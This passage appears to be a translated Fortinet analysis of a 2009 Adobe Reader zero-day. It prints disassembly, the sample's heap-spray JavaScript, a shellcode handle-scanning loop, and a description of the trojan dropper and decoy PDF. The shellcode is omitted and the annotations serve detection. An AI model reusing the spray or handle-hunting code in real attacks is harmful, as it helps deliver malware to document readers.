.text:009D7884 mov esi, edi ; edi is v_counter
.text:009D7886 sar esi, 3 ; v_counter/8
.text:009D7889 add esi, [esp+1Ch+lp_original_stream] ; pass how many bytes
.text:009D788D mov ecx, edi
.text:009D788F movzx edx, byte ptr [esi] ; read next byte
.text:009D7892 and ecx, 7 ; pass how many bits in the next byte
.text:009D7895 mov eax, 8
.text:009D789A sub eax, ecx
.text:009D789C sub eax, ebp ; ebp is always 1
.text:009D789E mov cl, al
.text:009D78A0 shr edx, cl ; set the lowest bit as the corresponding bit
.text:009D78A2 and edx, [esp+1Ch+var_8] ; var_8 is always 1, so corresponding bit is the DWORD value
.text:009D78A6 cmp [esp+1Ch+arg_C], 0 ; arg_C is always 0
.text:009D78AC jz short loc_9D78BC ; jump
...
.text:009D78BC loc_9D78BC: ; CODE XREF: sub_9D7850+5Cj
.text:009D78BC mov ecx, [esp+1Ch+arg_10]; get the old_DWORD
.text:009D78C0 add ecx, edx ; new_DWORD = old_DWORD + corresponding-bit
.text:009D78C2 mov edx, ecx
.text:009D78C4
.text:009D78C4 loc_9D78C4: ; CODE XREF: sub_9D7850+6Aj
.text:009D78C4 and dl, [esp+1Ch+var_9]
.text:009D78C8 add edi, [esp+1Ch+arg_8]
.text:009D78CC mov [esp+1Ch+arg_10], ecx ; save the new_DWORD
...
.text:009D78E5 mov eax, [esp+18h+arg_10] ; return the new_DWORD
// Analyst note: decoder helper used by the sample. Every "XX" in the input
// is rewritten to "%u", so a token such as "XX9090" becomes "%u9090", the
// form that unescape() later turns into one 16-bit character. The "XX"
// substitution presumably exists so the literal "%u" sequence never appears
// in the document body; that is the string to look for when inspecting
// similar samples. Returns the rewritten string; the input is not modified.
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
// Analyst note: the sample's heap-spray stage (the write-up's 堆喷射).
// sprdataxx decodes (via urpl + unescape) to a short 0x9090 filler string,
// which is doubled until it is at least 0x41000 characters long; 1700
// copies of filler + decoded payload are then kept alive in the global
// `memory` array. Observable characteristics for content inspection: the
// unescape() of a "%u"-encoded payload, the self-doubling loop, and a large
// array of identical large strings. `sprblk`, `scblk` and `memory` are
// assigned without `var`, so they become implicit globals.
function xxsc(sc){
var sprdataxx = "XX9090XX9090";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
for(x=0;x<1700;x++)
memory[x]=sprblk+scblk;
}
// Analyst note: the string literal on the next line is truncated in the
// write-up ("此处为ShellCode" = "shellcode goes here"); the payload itself
// is not reproduced, so this excerpt does not parse as-is. The version gate
// below only runs the spray when app.viewerVersion reports Reader 9 or
// later; on older versions the else branch spins forever, which hangs the
// viewer instead of falling through to normal rendering.
var s = "XXec81XX(此处为ShellCode)
var a=app.viewerVersion;
if (a >= 9) xxsc(s);
else while(1){};
.text:003042DC push offset stru_E886F0 ; lpCriticalSection
.text:003042E1 mov [esp+1Ch+allocate_len], offset stru_E886F0
.text:003042E9 call ds:EnterCriticalSection
.text:003042EF cmp edi, 80h ; allocate_len>0x80?
.text:003042F5 mov [esp+18h+var_4], 0
.text:003042FD ja short loc_30433B ; allocate_len=0x80, no jumping here
.text:003042FF movzx eax, ds:byte_BFD898[edi]
.text:00304306 mov ecx, [esi+eax*4+0Ch] ; get structure pointer which manages all recycled 0x80-length blocks
.text:00304306
.text:0030430A mov eax, [ecx+4] ; the first recycled 0x80-length block
.text:0030430D test eax, eax
.text:0030430F jz short loc_30432F
.text:00304311 mov esi, eax
.text:00304313 mov eax, [eax+4] ; next block
.text:00304316 test eax, eax
.text:00304318 mov edx, [esi-4]
.text:0030431B mov [ecx+4], eax ; take off the first block from the list
.text:0030431E jz short loc_304326 ; how many recycled blocks have been reused
.text:00304320 mov dword ptr [eax], 0
.text:00304326
.text:00304326 loc_304326: ; CODE XREF: acro_allocate_routine+7Ej
.text:00304326 add dword ptr [edx+4], 1 ; how many recycled blocks have been reused
.text:0030432A jmp loc_3043C4 ; exit, return the first block for use
// Analyst note: reconstruction (as given in the write-up) of the shellcode's
// handle-scanning stage. Starting from 0, each candidate value is tried as a
// file handle in steps of 4 until GetFileSize() succeeds and reports a file
// of at least 0x2000 bytes; the write-up treats that handle as the open PDF
// itself. dwFileSize is assumed to be declared outside this excerpt, and the
// loop has no upper bound, so it only terminates once such a handle is found.
DWORD dwTestHandle=0;
//test all the handles, with step 4.
while (1)
{
dwFileSize = GetFileSize(dwTestHandle,0);
if ((dwFileSize != -1) && (dwFileSize>=0x2000))
{
break;
}
dwTestHandle = dwTestHandle +4;
}
//the handle of the document's own file has now been obtained
接着,通过已经获得的文件句柄去找到并执行新的已经嵌入在PDF文档中的ShellCode:
图7:跳转到POC文档中的另一段ShellCode.
另外需要注意的是,这并不新颖。一年多以前“幻影军团”曾经使用“查找并执行ShellCode”的方法在一个恶意的PDF文档中。
新的ShellCode会执行以下动作:
1).从初始PDF文档中生成一个可执行文件并执行,这实际上是被我们的杀毒软件检测出来为“W32/Protux.GK!tr”的病毒。
2).从初始PDF文档中生成一个正常的PDF文档,并使用Adobe Reader 打开并使用同样正常的文档内容覆盖当前打开的恶意PDF文档:以取得完美的伪装效果。从结果来看,伪装文件的名字为:“The question of the charter of pro-democracy moment.pdf”,存放在系统Temp目录下。
接下来是关于新ShellCode的关键点。
图8:第一步在Temp目录下生成exe文件
图9:第二步执行生成的exe文件
图10:第三步生成伪装的PDF文档
图11:第四步用Adobe Reader 打开伪装的PDF文档
结论:
回头看这次0day攻击的整个过程,每一个部分——不管是漏洞触发、漏洞利用、漏洞背后的逻辑关系、促使改变漏洞还是最后的ShellCode——都是相当有技巧性的。
这个漏洞利用程序所采用的堆喷射方法(特别是其自身的创新之处)也可能在将来的Adobe Reader漏洞利用中被用到。
FortiGuard已经发布了FGA-2009-35公告来应对这个问题,这与Adobe的安全公告APSB09-15相一致。从2009-10-9起,我们的客户已经可以使用高级0day保护。
当我们的杀毒软件检测到PDF利用程序为“W32/Protux.GK!exploit”并且生成的可执行文件为“W32/Protux.GK!tr”时,IPS会以“Adobe.Reader.Decode.Color.Remote.Code”标示出。
我们再次建议 Adobe Reader 和Acrobat尽快升级应用程序到最新版本。
Disclaimer(以下为一些免责声明及公司简介,与技术无关,故不作翻译,译者注)
Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy
or completeness of the information. More specific information is available on request from Fortinet.
Please note that Fortinet's product information does not
constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing.
About Fortinet ( http://www.fortinet.com/):
Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems,
which are used by enterprises and service providers to increase their security while reducing total operating costs.
Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus,
intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats.
Leveraging a custom ASIC and unified interface,
Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based
solutions with integrated management and reporting.
Fortinet solutions have won multiple awards around the world and are the only
security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately
held and based in Sunnyvale, California.